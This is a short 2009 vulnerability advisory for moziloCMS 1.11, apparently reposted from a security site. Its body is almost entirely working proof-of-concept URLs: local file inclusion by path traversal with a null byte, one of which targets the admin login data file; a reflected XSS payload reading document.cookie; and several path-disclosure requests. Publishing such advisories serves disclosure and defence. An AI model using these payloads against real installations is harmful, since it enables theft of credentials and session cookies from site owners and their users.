moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilities

2009.04.25
Credit: SirGod
Risk: High
Local: No
Remote: Yes

############################################################################################### [+] moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilites [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org ############################################################################################### [+] Local File Inclusion PoC 1 : http://127.0.0.1/index.php?cat=10_Willkommen&page=../../../../../BOOTSECT.BAK%00 PoC 2 : http://127.0.0.1/index.php?cat=10_Willkommen&page=../../admin/conf/logindata.conf%00 [+] Cross Site Scripting PoC : http://127.0.0.1/index.php?action=search&query=<script>alert(document.cookie)</script> [+] Path Disclosure PoC's : http://127.0.0.1/gallery.php?gal[]=moziloCMS http://127.0.0.1/index.php?cat=10_Willkommen&page[]=10_Willkommen http://127.0.0.1/index.php?cat[]=10_Willkommen&page=10_Willkommen http://127.0.0.1/download.php?cat=10_Willkommen&file[]=text.txt ###############################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top